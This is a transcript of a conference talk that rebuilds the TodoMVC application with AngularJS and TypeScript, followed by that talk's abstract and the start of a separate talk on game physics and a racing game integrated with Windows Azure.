And then we get the compilation step, where you get syntax and type checking. You can get it to concatenate all your various TypeScript files into one big JavaScript file. And actually the JavaScript that it outputs, you could read it and go: that's basically the code I wrote, but without the type annotations and the interfaces, because most of what it does is subtractive. It takes away the hints that you've given it. The only thing that is a big change is when you've created a class: it creates the default prototype inheritance and supers and all this sort of thing. It can target ECMAScript 5 or ECMAScript 3. The default is ECMAScript 3. You need that if you want your application to run in IE8. You don't want your application to run in IE8, because it's crippling. It's not just the TypeScript features that you lose, it's also the JavaScript features that you lose: array.forEach, for example, is not there. If you have got a sufficiently complicated application that it makes sense to build it using AngularJS or TypeScript or both together, then you've got a sufficiently complicated application that, in my opinion, you can go to your users and say: IE9, Chrome, Firefox or the other one. There are no runtime libraries for TypeScript. It puts a couple of bits of extra code in sometimes if you need something, but it doesn't have a big runtime library that you have to download as well. So that's TypeScript. AngularJS. Who's done AngularJS stuff? It's brilliant, isn't it? Isn't it the best thing ever? So much better than... that's rubbish. So AngularJS: the team at Google officially describe it as a model-view-whatever framework, because the models are plain old JavaScript objects, which is nice. The views are plain HTML with some additional attributes and elements in there. And then you've got the whatever, and depending on how you're actually writing the Angular, and it's quite flexible about this, the whatever might be the scope.
That's the kind of minimal unit of whatever that thing is. But you've also got controllers, and actually scopes are controlled by controllers, so it's a kind of MVC. But then you've also got the fact that you can put the controller onto the scope, and then you get something that's a bit like MVVM. Angular also has services and providers and factories, which are three different ways of doing exactly the same thing. And directives, which are ways of creating your own web components, in a way that is going to become standard once the W3C, whatever the hell they are, actually finish the web component specification. So, Angular plus TypeScript. I'm going to jump to code now. As I'm going along, if you are getting lost, if I skip over something accidentally, then please do shout out. Don't save your questions until the end, because I'll have forgotten what I was talking about by the time we get there. So I'm going to go to Visual Studio and I'm going to say File, New Project, and I'm going to go to Other Languages. This is Visual Studio 2013 Update 2, and I have ReSharper 8.1 installed. So we'll call this TodoMVC demo. What I'm working from here is a project run by a few people called TodoMVC, where they implement the same very small application over and over again using all the different frameworks, and every time a new framework comes out, the first thing that you do when you release your framework is make sure you've sent a version of TodoMVC based on it to these guys, so they can put it in there. So you can get React and Backbone. And I've taken the standard JavaScript TodoMVC implementation and I'm going to rebuild it using Angular and TypeScript, and I'm going to whack it up onto GitHub so that you can go and get it and fiddle around with it. So the structure here is that you've basically got an index.html page, which has got Angular templates inside it, and then we've got our app.js, which sets up routing and pulls everything together, and we've got two directives.
We've got a service. It's actually a factory in here, but it'll be a service by the time I finish with it. And we've got a controller, and then there's some other bits and pieces that we'll just drag in from my cheating folder. So when I create a new TypeScript application, because it's still quite a new language, obviously they have to put some arbitrary rubbish into my TypeScript window there, so I'm actually just going to get rid of app.ts altogether. Yes, pneumonia. Does anyone want some? You're sat far enough back, it'll be fine. So, right: cheating. And let's go back to here and we'll open this up in File Explorer. Put that that side, put that that side. And I'm going to drag index.html across there, because it's big and complicated, and then I'm also going to drag the CSS across there, because that's got stuff in it that we need as well. I'm going to go back to here, show the hidden files, include that in the project, and we'll add a new folder called TS. Right, so what I've got now is an index.html. Up at the top here, that data-framework attribute is just part of the TodoMVC thing. I'm including my CSS, todomvc.css, which is there. And then down here I've got my body, and that's got an ng-app attribute on it, and that's saying the top-level module for this application is called todomvc, and then we have an ng-view element, and basically that's it. That's our empty space. If I run this now, we'll just get an empty page, and if I go to the console here, I will get told that nothing has happened at all, because we don't have anything in there yet. So I'm going to go to NuGet. I'm going to go to NuGet to get the AngularJS script files. Slowly. Right: when you go to NuGet and try to get AngularJS, there are lots of different packages. There's the AngularJS that is maintained by these guys. That's the whole of Angular, and it will download everything.
But John Papa and some other guys, Scott Allen and Jeremy Likness, also maintain various packages which are the different modules from Angular, and that's actually the best way to go, because there's a lot of stuff in there that you might not need. Why download it if you're not going to run it? So I'm going to install AngularJS.Core and AngularJS.Route, and then down here I've got AngularJS.TypeScript.DefinitelyTyped. So every library that's in the DefinitelyTyped repository has a NuGet package that is automatically maintained by some kind of continuous integration system. So I'm going to install that as well. There we go. So those have gone into Scripts: I've got AngularJS core and Angular route. And then the DefinitelyTyped packages create a typings folder, and it's actually brought in jquery.d.ts as well, for reasons that we will go into shortly. So if I run this... let me just check my index.html now. If I go down to the bottom, we can see that I need todomvc-common. So let me just open that up. This is shared by all the TodoMVC implementations. So let's put that in there as well. And there we go. That's the wrong window. I wish it was possible to theme windows individually. So, include todomvc-common in there as well. So now I'm getting todomvc-common and Angular and everything else. So if I just run this now, I'll get a build error. Really? Yes, continue and run the last successful build. Right. So now the CSS files are in there and so forth, and if I hit the console here, I will see this: failed to instantiate module todomvc, because I haven't actually written any code for that yet. So we're going to start off looking at service classes. We're going to do this in a very kind of painful way, which now involves me not being able to run the application until we've got to the other end. It's difficult to do it piece by piece without showing you guys the most complicated bit first. And I don't want to do that. I want to ramp up gently.
So we'll start off looking at the service class. And those notes are in there just for the people who ask about the slides afterwards. So in the JavaScript, we're using Angular's factory thing to create a todoStorage factory, which is going to return this anonymous object here with a get function and a put function. Which is kind of, yeah. The way we are going to do this in TypeScript is we're going to go to here, and we will add a new TypeScript file. I'm assuming, by the way, that if anyone couldn't see the code, they would have shouted by now, so you're all kind of following along quite happily. It could be bigger, could it? There you go. You could sit closer. No, it's not a keyboard shortcut; it's in Fonts and Colors. Let's try 18. Any better? Yeah. Right. Now, the interesting thing is that I've brought this in... I've just pasted JavaScript into a TypeScript file, and that is valid TypeScript. TypeScript is a superset of JavaScript for the most part, couple of exceptions. But for the most part, you can just pick up and copy and paste some JavaScript into a TypeScript project and it still works. It's still valid. So the first thing that this is telling me here, this is ReSharper, is saying this function can be converted into a lambda expression. If I say, go on then, do that, I'll get ReSharper telling me it's failed to modify documents. I'm blaming Visual Studio at this point. I expect it'll build now as well. Come on. I'm plugged in. I can do that. Right. So I can convert that to a lambda expression. I don't know about you, but you hear the JavaScript zealots going: oh, it's great because it's a functional language, functional programming, yay. And I do think, for a functional language, you have to write the word function quite a lot. In a functional language, you shouldn't have to do that. You should only have to say when something isn't a function.
Everything that you don't explicitly mark as not being a function should be a function. And so we have lambda syntax. And again, this is an ECMAScript 6 syntax; it has this shorthand for declaring functions. I'm going to take out 'use strict' because I don't need it. And then I've got my storage ID, 'todos-angularjs', and I've got some functions here. Now, I'm not going to convert those, because actually at this point we want to create a class. So I'm going to create a module to keep it in, like that, nice and easy. And then I'm going to export a class and call it TodoStorage, like that. And then I am going to have a constructor. Now, down here, we're seeing that in the JavaScript code, the person who wrote the AngularJS TodoMVC thing didn't really do this properly, because they've created a todoStorage that isn't unit testable. And Angular is all about being unit testable and TDD-able, even though it's dead. And so Angular gives you a $window service. And so I can say $window here, and then I can access the local storage, so I can say $window.localStorage. Let me just put this after there. I'll say ng.IWindowService. Look: IntelliSense, proper IntelliSense. Those are all the interfaces that are declared in the ng module. So now I can say $window dot, and I can see all the things that are in the window type. The window type is created by Angular so that you can mock it when you are writing tests for your local storage thing. So you can say: create an instance of TodoStorage with this object that I've just mocked up or stubbed up, which has got a localStorage property, which has got getItem and setItem methods, and you can test without actually needing to modify your browser's storage. I'm not going to do anything in the constructor, though. I'm going to use that window variable in these methods. So I'm going to say public get, to declare a method on here, and then I can say return JSON.parse($window.localStorage.getItem(storageId)). Okay.
It can't find $window, because it's up in the constructor and I haven't put it anywhere. Now, what you could do is say private $window, colon, and all this sort of stuff, and then assign it down there. But TypeScript, one of the nice things it's taken from ECMAScript's class syntax is that you can put an access modifier on parameters to your constructor, and it will automatically create a field with the same name and the same level of visibility. It is important to note at this point that I am saying the $window member is private. TypeScript will respect that: TypeScript will not let me access that $window member on this class from other TypeScript. Once the TypeScript is compiled and has been turned into JavaScript, it's not private any more. This has been a cause of some discussion. People have said that there are ways of making it private. The problem is that the ways that there are of making things private in JavaScript objects tend to be quite heavy on memory: it involves creating a lot of closures; it involves creating functions over and over again, instead of just once on the prototype. Microsoft has said it's private as far as TypeScript is concerned, but it's just public as far as JavaScript is concerned. So we're going to put that on there. Then down here we're going to say this-dot, like that, and then that becomes a typed variable. Then we're just going to take this storageId out of here, and I'm going to put it up there in the module, and that makes that show up as well. Then I can just say angular.module, .service, and put 'todoStorage' and TodoMvc.TodoStorage, like that. Okay. So there we go. That's TypeScript. I didn't do the set. Let's just go and grab the set. Is it hot in here, or is it just me? Okay. So there we go. I think I've already won at this point, just from this class syntax. I think everyone should say: Mark, you're completely right, you don't need to tell us any more, but it would be nice for informational purposes.
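Pulling the pieces of this section together, the class being described might look like the sketch below. It is self-contained, so a minimal structural stand-in is declared in place of the real ng.IWindowService from the typings, and the storage key string is an assumption:

```typescript
// A sketch of the TodoStorage class built up in this section. The
// IWindowService interface here is a cut-down stand-in, not the one
// from angular.d.ts; the talk wraps the class in module TodoMvc { }.

interface IWindowService {
  localStorage: {
    getItem(key: string): string | null;
    setItem(key: string, value: string): void;
  };
}

const storageId = "todos-angularjs"; // not exported: hidden inside the module

export class TodoStorage {
  // "private" on the parameter declares and assigns the field for us
  constructor(private $window: IWindowService) {}

  public get(): any[] {
    return JSON.parse(this.$window.localStorage.getItem(storageId) || "[]");
  }

  public put(todos: any[]): void {
    this.$window.localStorage.setItem(storageId, JSON.stringify(todos));
  }
}
```

Because anything with a matching localStorage shape satisfies the interface structurally, a stubbed object can be handed to the constructor in a test — which is exactly the testability point being made about the $window service.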
But yes, we've got a class instead of a function. We've got a constructor which automatically creates a private member just by setting a modifier on the parameter name, and we've got two methods declared in the way that one might expect to declare methods. Now, I've put public on the start of these methods. That's actually optional, in the same way that in C#, if you don't say private, if you just say void something, then that function is automatically private, but actually most coding standards say please be explicit; it's better to have private in there. So the public is implicit. If you want it to be private, you put private. If you want it to be public, you don't have to put public, but I like being explicit just on general principles. So that's the TodoStorage class, and if I go to my TS folder here and I have hidden files turned on, you can see every time I save that TypeScript file, I've got Web Essentials installed and it compiles it for me. I can actually go into Web Essentials and turn on a split-screen view which will show the compiled JavaScript on the right-hand side of the editor pane. I'm not going to do it here, because a man over there complained that he couldn't see the code and it will just make everything ridiculous, but when you first start with TypeScript, it's actually quite a handy thing to have. So this is what it generated, and you can see this is effectively our class declaration here, and we've got a prototype, so we're creating it. So it's the standard JavaScript pattern for creating the equivalent of a class. Oh, the other thing that we got in there is a .map file down at the bottom, which will come in very handy later when none of this works and I'm in Chrome trying to find out why. Right. So in our service class, we exported it from the TodoMvc module. If you don't export something, it's hidden inside the module. So like my storageId var: I didn't export that, so that's held inside the module, keeps it off the global namespace.
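The split-screen compiled output described here has roughly the following shape. This is a hand-written equivalent, not the compiler's literal emitted text: an IIFE returning a constructor function, with methods attached to the prototype so they exist once rather than once per instance, and with the private modifier completely erased at runtime.

```typescript
// Hand-written equivalent of the ES5 JavaScript the compiler emits for
// a class. Typed as `any` so we can use `new` on it below.
const CompiledTodoStorage: any = (function () {
  function CompiledTodoStorage(this: any, $window: any) {
    // The parameter property became a plain assignment.
    this.$window = $window;
  }
  // Methods live once, on the prototype, shared by all instances.
  CompiledTodoStorage.prototype.get = function (this: any) {
    return JSON.parse(this.$window.localStorage.getItem("todos") || "[]");
  };
  CompiledTodoStorage.prototype.put = function (this: any, todos: any[]) {
    this.$window.localStorage.setItem("todos", JSON.stringify(todos));
  };
  return CompiledTodoStorage;
})();
```

Two consequences worth noticing: every instance shares the same prototype functions, and the "private" $window field is a perfectly ordinary public property as far as the running JavaScript is concerned.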
I exported the class so that I'll be able to use it from other places. I used a field modifier to set $window as a private field on that class, and I created a couple of methods using nice clean method syntax. Directives. Directives are quite straightforward. Yeah, he lied. I'm not going to go hugely into directives because Scott Allen is doing a talk in the next slot on AngularJS directives, and if you are intending to use AngularJS, or if you've just started using AngularJS and are looking to make the most out of it, or if you've been using AngularJS for two years but you haven't actually created any directives yet, then you should go to that talk, because directives are literally the best thing about Angular. They are completely awesome. I'm going to go over to here, and I've got two directives in this project. One is called todoFocus, and this is a directive that says when a condition is true, set the focus to this input control, and there's one called todoEscape, and that is an escape-key handler for an input control. I'm just going to copy these across and we'll look at how we can turn them into TypeScript. I appreciate that what I'm showing you is kind of how to turn JavaScript into TypeScript, but it seemed to me to be the best way to highlight the differences and the advantages and so forth. I'm going to create todoFocus.ts and we'll just bring that in here. Main difference is here. I'm not going to do any class stuff at this point; it doesn't make sense for a directive to be a class, so I'm going to convert that to a lambda. And this was a late addition to TypeScript. It used to be that you always had to have the parens around the argument for a lambda, even if it was just a single argument, which was different from C#. They've changed it now, so if you do just have a single argument and you don't want to type-annotate it, you can leave the parentheses off. I do want to type-annotate it.
I'm going to go into here, put the parens back in, and say ng.ITimeoutService, and then I can turn this into a lambda expression as well, and I can say ng.IScope, and then here, the element. Directives: do go to the talk, you'll learn all about this. It's nice and easy to remember the argument order though, because it's S, E, A, "sea": scope, element, attrs. Unless you're not English, in which case you probably don't have the word "sea", in which case it's not that helpful. Sorry. The second argument is the jQuery element, and I can actually represent that just by saying JQuery. And then attrs doesn't have a type, because attrs is an anonymous object, basically like a dictionary, which has got values in it for all the attributes that have been set on that element. In TypeScript, you can say any, which is the equivalent of, like, C# dynamic, to say this can have all kinds of properties on it; I don't want you to do any type checking at all here. Then we're saying scope.$watch, and we're going to watch the todoFocus value from the attributes, and then, if the result of watching that variable is true, it's probably easiest to show you the code for this. There we go. todoFocus: it's going to evaluate this expression here. We're going to have a todo which is in this list, and we're going to have an editedTodo, and if those two are the same thing, then we're going to call element[0].focus(). That's all this is doing here, not that complicated. That's that converted over, and we've now got nice type checking. One of the great things about this type checking is that Angular's API is extremely complicated. If you try and do Angular without TypeScript and without any kind of IntelliSense help, you end up with your IDE open and the AngularJS docs on another screen and probably the Mozilla docs on another screen and your application actually running on another screen, and then going to your boss and going, I need a fifth screen. He says, what for? You say, Twitter. He says, no, use your iPad.
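The shape of that todoFocus link function can be sketched as below. This is not the talk's literal code: the IScopeLike interface and the array-of-focusables element type are stand-ins invented here so the logic can run without Angular; the real signature would be (scope: ng.IScope, element: JQuery, attrs: any), and the real directive defers the focus call with $timeout.

```typescript
// Tiny stand-in for the bit of scope.$watch this directive needs.
interface IScopeLike {
  $watch(expr: string, listener: (newValue: any) => void): void;
}

// Watch the expression named in the todoFocus attribute; when it
// becomes truthy, focus the underlying element (element[0] in jQuery
// terms). `attrs` is deliberately `any`, as discussed above.
function todoFocusLink(
  scope: IScopeLike,
  element: { focus(): void }[],
  attrs: any
): void {
  scope.$watch(attrs.todoFocus, (newValue) => {
    if (newValue) {
      element[0].focus(); // the real code wraps this in $timeout
    }
  });
}
```

Because the function only depends on those two small shapes, it can be exercised with a fake scope and a fake element, which is the same testability argument as for the storage service.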
That's my favorite thing about TypeScript: I don't actually have to learn the frameworks that I'm using. I don't know why that's even open. I hate Browser Link. Let's just quickly do todoEscape, and just to make the point, I'm going to go here and I'm going to grab this, and I'm going to go here and I'm just going to paste it. I'm not going to do anything to that at all. That's going to work fine. That was fun. Right. It's still not going to work though, because we have to do our controller. Directives: the main difference is the lambda syntax, and in a bit we'll talk about why lambda syntax is different from function syntax, even though function is still valid. Let's move on to the controller class. To go back to the JavaScript, if we go into this todoCtrl here, we can see that it's being declared using .controller, which is an Angular module method, and then we're creating a function, TodoCtrl, and then we're getting these, which get dependency-injected, and then we're doing a whole bunch of stuff with scope, and we're adding functions to scope and everything else. Actually, when you write an Angular controller, what you're pretty much doing is writing one function which just sticks a bunch of stuff on the scope. That's great if you're doing JavaScript. It's not so great if you're doing TypeScript and you want nice clean maintainable code. I am going to drag across my cheating file, because you do not want to watch me try to live-code this TypeScript, and then we will bring across TodoCtrl.ts, and then we will refresh this and include TodoCtrl.ts in the project. Side-by-side comparisons. We've got a function here that's taking various parameters, and in TodoCtrl we've got a class, and it's got a constructor which is taking the same set of parameters. Over here, you can see that we've got a private todoStorage which is of type TodoStorage. That's linking me across to my TodoStorage class that I created earlier on.
Angular's dependency injection is going to be able to work out what that is, because over here I am going to remember to say angular.module("todoMvc").service("todoStorage", TodoMvc.TodoStorage). That's registering that class with the Angular framework and saying: whenever a function has a parameter called todoStorage, I want you to pass in an instance of this. Services in Angular are by design singletons. The first time your application asks for one of them, it will be created, and then it will just be passed around, never recreated, until someone does a page refresh. It's important to remember that, because it means that services are a fantastic place to cache things that you don't want to have to recompute every time you create a new controller, or to pass information between controllers. Yes? It does. If I pop back to my TodoCtrl and I go there and hit F12, it takes me to there. If I go back... sorry, the question was, does Visual Studio's F12 work with TypeScript? The answer was, as I have just demonstrated, yes. I forget to repeat the question. If you do this on something from a definition file, it will take you to the definition file, and then you can go wandering through there. You will notice that this is an interface. I am not going to create any complicated interfaces, but one of the things about interfaces is that you can have overloads. Obviously in JavaScript you can't have overloads, because you can't declare the same function twice; you will just end up overwriting the previous function. Things like jQuery and Angular do very complicated things when you first call a function and say: what have I been called with? Is it this? Is it that? Is it the other? In TypeScript interfaces, you can declare the method over and over again with all the different signatures, and that gives you nice IntelliSense and type checking and everything else. In my todo controller, I have got my scope and so forth, and I am going to set up this.
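The singleton lifetime described here, created on first request, then the same instance handed out until a page refresh, can be illustrated in a few lines. To be clear, this is not Angular's injector, just a toy registry (the name TinyInjector is invented) showing the behavior being described.

```typescript
// A toy service registry illustrating Angular's service lifetime:
// instantiate lazily on first request, then cache and reuse.
class TinyInjector {
  private instances = new Map<string, any>();
  private factories = new Map<string, new () => any>();

  // Register a constructor under a name, like angular.module(...).service.
  service(name: string, ctor: new () => any): void {
    this.factories.set(name, ctor);
  }

  // Create on first ask, then always return the cached instance.
  get<T>(name: string): T {
    if (!this.instances.has(name)) {
      const Ctor = this.factories.get(name)!;
      this.instances.set(name, new Ctor());
    }
    return this.instances.get(name);
  }
}
```

That shared instance is what makes services a natural place to cache computed data or to pass state between controllers, as the talk points out.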
I am going to call todoStorage.get and keep the todos in this public section up here. I have created an ITodo interface. These are just being serialized to and from JSON, so they can't actually be a class; I can't declare a class with properties, because JSON doesn't know about classes and properties. In order to give myself some IntelliSense, I have declared an interface for my JSON objects. I have also created an interface for an IStatusFilter, which you will see further down as well. I have got that there. Then I am setting up scope.$on. When the route changes as part of AngularJS's routing, it is going to call this.onRouteChange. When I first started doing TypeScript and Angular together, and actually I wrote and launched an entire project using this approach, the problem when you said my scope is of type ng.IScope is: if you then come along like they do in the JavaScript code and say scope.todos equals something, then TypeScript goes, scope hasn't got a todos property on it. Then you end up going, how am I going to deal with this? What I started out by doing, and what you will see in the current official TypeScript Angular solution on TodoMVC, is export interface ITodoScope extends ng.IScope, and then putting in things like todos. Then I would be able to still get the IntelliSense on all the scope stuff, but I would add in all this stuff as well. This, however, was hideous, and the main reason it was hideous is because you are not making the best use of a class; you are essentially just creating a class and then using its constructor to set up a bunch of scope stuff. More importantly, you end up with this split responsibility where you are in your class and you are adding functionality or properties to the scope, but in order to do that you have to go and change the interface as well. Any code practice that requires you to make a change in two places just to change one thing is not a good coding practice.
Like I say, that didn't stop me from building and launching an entire product with it, but then they released a version of Angular which added some additional syntax. What people had been doing in order to get around this limitation was adding the controller itself as a property on the scope, which you can do if you use a string indexer; then type checking goes away and you can do what you like. I don't recommend you use the weird opening quote that's found its way into my PowerPoint slide, but yes, and then you can bind to things on the controller. The Angular guys thought this was a good way of working, they quite liked it, and so they added a "controller as" syntax to the routing system. I'm just going to bring in TodoMvc.ts, we'll copy that across as well, and bring that in here. Yes, this is where we're setting up our routing, and we're basically saying: when we go to the route, then just display the page normally; when we go to the route with a status argument, then do the same thing, but we'll do some extra stuff inside the controller. But on both of those, we've got controller as todoCtrl. Take that out, because that will certainly annoy me later. So yes, what that does is it automatically, when it creates an instance of TodoCtrl, adds it to the scope for the current element and gives it the name todoCtrl, which means in our index.html we can reference anything that's exposed on that controller object by prefixing things with todoCtrl. Which means I don't need to put anything on the scope at all; I can just say this.todos, and then from my HTML I can bind directly to those todos on the object down here. So I can bind to my properties, and I can bind events to methods on my controller, in a similar way to the command pattern in MVVM. And actually, in my more complicated thing, I've actually re-implemented the command pattern, and I have a command object which has got an execute and a canExecute method, and it's all very WPF-y, but in a nice way.
Properties. Properties are the reason you don't want to support ECMAScript 3. TypeScript has syntax for declaring properties on a class. It's from ECMAScript, and it wraps around the Object.defineProperty functionality that's built into ECMAScript 5. If you have targeted ECMAScript 3, then it will not be available. And if you have created a new project and you haven't gone in and hacked around with your templates, then at the bottom of your .csproj file you get various settings that tell it what version of ECMAScript to target. You want to change that to ES5, and then you will be able to use properties. It's one of the things that comes up when you have the discussions about my framework is better than your framework and my dick's bigger than your dick and all this sort of thing. Ember.js has computed properties. Knockout has computed observables. They've both effectively invented properties; they've invented a custom way of doing properties. Angular, because it just binds to plain old JavaScript objects, you can just bind to properties, which means in TypeScript we can declare them as properties. So if we go back to the JavaScript code, you can see that one of the things that it's using the scope for is to say: every time the todos collection changes, I want to change remainingCount and completedCount and allChecked on the scope, which is not really the best way of doing things. In TypeScript, we don't have to do that. We can just say: I'm going to have a property called completedCount and a property called remainingCount and a property called allChecked, and I'm going to calculate that on the fly, which is similar to what you would do with a computed observable in Knockout or a computed property in Ember. And within there, I've just created a standard count, because JavaScript doesn't have a count, but it does have reduce, and allChecked and so forth. And yes, it does. Where's the todoStorage.put gone? That's it. Okay.
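Those computed properties might look like the sketch below (the class name TodoCounts is invented for this example; the ITodo shape matches the interface described earlier in the talk). Note this needs an ES5+ compile target, since get accessors compile down to Object.defineProperty.

```typescript
// The JSON-shaped todo interface described earlier in the talk.
interface ITodo {
  title: string;
  completed: boolean;
}

class TodoCounts {
  constructor(public todos: ITodo[]) {}

  // Computed on the fly, like a Knockout computed observable or an
  // Ember computed property, but using plain ES5 get accessors.
  get completedCount(): number {
    // JavaScript arrays have no count(), but reduce works nicely.
    return this.todos.reduce((n, t) => (t.completed ? n + 1 : n), 0);
  }

  get remainingCount(): number {
    return this.todos.length - this.completedCount;
  }

  get allChecked(): boolean {
    return this.remainingCount === 0;
  }
}
```

Because Angular binds to plain object properties, HTML like {{todoCtrl.remainingCount}} just works against these getters, with no manual scope bookkeeping when the collection changes.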
I've then also got a whole bunch of public methods, and these are all bound to click events in the HTML code. So there's an addTodo, which gets called when you type in a new todo value there. Probably worth just seeing if I can run this quickly so we can actually see what we're talking about. Should have done this about half an hour ago. Yes. There we go. So yes, this is what it looks like. And so when I type something in there and hit enter, the form's submit event is bound to that addTodo method on my TypeScript class. Stop. So yes, an editTodo and a removeTodo and all these things are implemented as methods on this class, just using normal method declarations here. Again, I've put public on them. Now, actually, I don't have to do that, and I could mark them all as private; it would still work. At this point, I'm using public and private as a note to myself to say: this is a method that I've put on this class to be consumed from binding in the HTML. And if I've got it marked as private, like, for example, save is marked as private, then that's going to be called from inside the class. It actually doesn't make any difference at all. Like I say, public and private are discarded by the time you get into JavaScript, which means they will all be visible if you want to bind to them from your HTML code. But I like using this pattern to remind myself what the hell I've been up to, because I tend to forget, usually after about two minutes of Twitter. Now, up at the top, I've set up an event handler here. You get all sorts of events generated by Angular that are sent around on the scope. And what I'm doing is saying: when I get the $routeChangeSuccess, so when the URL that we're currently on changes (that won't necessarily trigger a browser refresh, because we're after the hash now, because this is a single-page application, so Angular watches the URL and tells you when it's changed), I am calling this.onRouteChange.
And if I jump down to that, you can see that I've forgotten to put this in there. And I've forgotten to put a private on my $routeParams. There we go. That works. But I am using a different way of declaring a method here. TypeScript 0.8, the first version, and quite a few subsequent versions: there are problems with the way you declare methods. If we go and look at the JavaScript that has been generated for TodoCtrl.ts, you can see that all the methods are declared on the prototype, and they have a normal this and everything else. That's great, because they are methods. But JavaScript doesn't really appreciate the difference between methods and functions, and they are two separate things. And you get into this problem with what this actually means. And this means whatever that function has currently been bound to. So when you call addTodo, for example, and you call it by saying todoCtrl.addTodo, then this refers to that instance of TodoCtrl, because you've accessed it through the prototype. If you pull that function off and pass it somewhere as an event handler, this points to the function's own little context that it's created for itself to float around in. Is that a hand up for a question or a stretch? Okay. I'm sorry to draw attention to your aging body. That causes a problem when you're doing event handlers like this onRouteChange. And this, once you'd pulled it off, you wouldn't be able to see this.$routeParams, because it would not be set on that particular context. And there were various ways around this. You could say this.onRouteChange.bind(this), and that would tie that function to the current context. The other thing that people did quite a lot was they would create an anonymous lambda there, which would also have the same effect.
But this was such a common pattern with various frameworks that the team decided to come up with this alternative, fully supported approach, where what I'm doing here is not really creating a method: I am creating a function and assigning it to a property on my class. And there's a very important distinction with this when it's inside a lambda. If we go and look here, all my normally defined methods are declared on the prototype, as you would expect, but my onRouteChange is actually declared as a property on this while the thing is being set up, and it's created a _this variable up here, quite a common pattern in JavaScript, and then inside this function it's using that instead of the built-in this. That's default behavior for a lambda. If you create a lambda and refer to this inside the lambda, then it will use this closed-over _this variable, so you can be sure that it's always going to point to what this was in the right place. This does trip you up sometimes, and you end up having to actually write functions for jQuery, for example, where you wanted to use what this would have been. And so if you fall over that, then you have to revert back to the function syntax and put in the ReSharper comment that says: stop telling me this can be converted to a lambda, you don't know anything. So that now is everything in my TypeScript application. I'm just going to check that I've got all my includes down at the bottom here. What I need to do for Visual Studio's sake is select all of these and include them in the project. And then run it. And there we go. There's my TypeScript version of this. Done. That's it. Basically, that's the TodoMVC application implemented in TypeScript the way I think it should be done, also known as the right way. I will put this up onto my GitHub. I will also be submitting this back into the TodoMVC project, because the current TypeScript implementation is not 100% the best way you can do things.
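The distinction just described, a prototype method whose this depends on the call site versus a lambda property that captures the instance, can be shown in a few lines (the class name Handler is invented for this illustration).

```typescript
class Handler {
  public label = "bound";

  // A normal method: lives on the prototype, and `this` is whatever
  // the call site provides -- fine as h.method(), broken if detached.
  method(): string {
    return this.label;
  }

  // A lambda assigned to a property: compiled with the `_this` capture
  // pattern, so `this` is fixed to the instance at construction time.
  arrow = (): string => {
    return this.label;
  };
}
```

This is why the talk uses the arrow form for event handlers like onRouteChange: the handler can be passed around freely and still see the controller's fields.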
Do I have any slides left? Yes, but those are all rubbish and pointless. So, tools. If you're using an IDE, then Visual Studio 2013 for the .NET guys; make sure you've got Web Essentials installed even if you're not doing TypeScript or Angular, even if you're not doing web development, to be honest, it's just essential. ReSharper 8.1 I was using; that's got great TypeScript support. If you're on a Mac or Linux box, or you don't want to pay a fortune for Visual Studio Pro, then JetBrains WebStorm is superb for working with TypeScript. Adobe Brackets, if you've seen that, that's quite fun for playing with; that's got a TypeScript code completion plugin and syntax highlighting, and there are various packages for Sublime Text. If you're just hardcore Vim and you don't want any of this sort of stuff, then you've got command-line tools in Node: you can do npm install -g typescript, and then you'll get a tsc. There is a Grunt plugin called grunt-typescript, which you can include in your Grunt file. If you're a Gulp user, then... cough. You can use Grunt to compile it and minify it and annotate it and all this sort of stuff. That's basically it for the talk. Any questions now, quickly? I will be around for the rest of the conference if you want to come up and ask to look at some actual code or solve a specific problem. Very happy to help you with that. Any quick questions now? No, no, I covered everything in such detail that there's no questions left to ask. If you want to pursue this further: angularjs.org, typescriptlang.org, and github.com/borisyankov, that's DefinitelyTyped. Just Google "DefinitelyTyped", it comes up. You can get hold of me through those things down the side there. If you're using Azure Storage, please buy Zudio. That's it. Thanks very much for coming. Enjoy the rest of the conference.
AngularJS is Google's answer to client-side JavaScript MVW application development. TypeScript is Microsoft's answer to working with large, complex JavaScript code-bases, bringing static typing and EcmaScript 6 features to current browsers. The unholy pairing of the two bears fruit that is, quite possibly, the best data-bindy, view-modelly, uber-productively effective development system I've ever used (and I've used a lot). Come and learn how to splice the DNA of framework and language to create AngularTS, and get the joy back in your programming life.
10.5446/50576 (DOI)
Good afternoon. Welcome to the session that I'm going to be delivering on game and simulator physics for developers, gamers and petrolheads. My name is Alan Smith. I work for a consultancy company in Stockholm called Active Solution. You can probably tell from my accent that I'm not from Sweden; I'm actually from the UK. My main focus is working on Windows Azure, cloud computing and working with customers who are moving applications to the cloud and want to leverage Windows Azure services. I recorded a course for Pluralsight, and during recording that course I wanted something that was going to be a fun way of showing how we can leverage Azure services. So I took a sample game that Microsoft had developed on the XNA platform and integrated it with Azure services. And during the development I kind of got a bit carried away with looking into the game code. Gaming and game code is very addictive. So if you start playing around with this stuff on Friday afternoon, kiss the weekend goodbye; you're going to be spending all weekend playing around with this stuff. It's great fun. You can get addicted. I did spend a lot of time looking into working with physics and simulations in the actual game to try and get the game a bit more realistic. And I've been doing some presentations on this. So I'm not a game developer; I don't really do this as a full-time job. This is more of a hobby session. But I think there's a lot of stuff that we can learn with building applications where there's some kind of visual user interface. It really, really helps and makes the applications feel better. Strange concept, you know: you don't actually touch the application, you see it and hear it and maybe feel it a bit if it's got some vibration or tactile feedback in a controller or in a phone. But you talk about the feel of an application, and you can really increase that if you understand a bit about how physics works.
So the project that I've been working on with integrating a racing game with Azure, I've given it the title of Red Dog Racing. If you watch any Formula One, you'll have heard of Red Bull Racing, who is a Formula One team. And if you've followed Windows Azure, you'll know that Red Dog was the actual original code name for some of the Windows Azure technologies. So I kind of, you know, mixed those two together and came up with that actual name for the game. Disclaimer, I've done this session a few times and another session on the Azure integration and telemetry and stuff. And people, you know, come out of the session with the assumption that I've actually written the game. I did not write the game. It's developed by Microsoft. It's available as a sample application for the XNA platform, which is now available on CodePlex. If you want to play around with this stuff, you can go and download the full source code and models available at that URI. I mean, if you just go in and search for XNA racing game, you'll get the actual codes to download and play around with. What I have done, though, is done lots of modifications on the game. I've rewritten the physics engine completely for the way the car interacts with the track and all of the actual forces. Modified some of the textures to actually customize it to put the Windows Azure logo in it and our company logo in it. Modified the track layouts, integrated the game with Azure services. So the replay data for ghost cars is going into blob storage, lap times and telemetry data into table storage. And I'm using the Azure service bus for telemetry data streams. And that's really, I'm not going to talk too much about that today. That's kind of the Azure and cloud computing side of things. I've built a website that shows the gaming stats. So you will see a lap times and telemetry data available on that website if you're working on the game. 
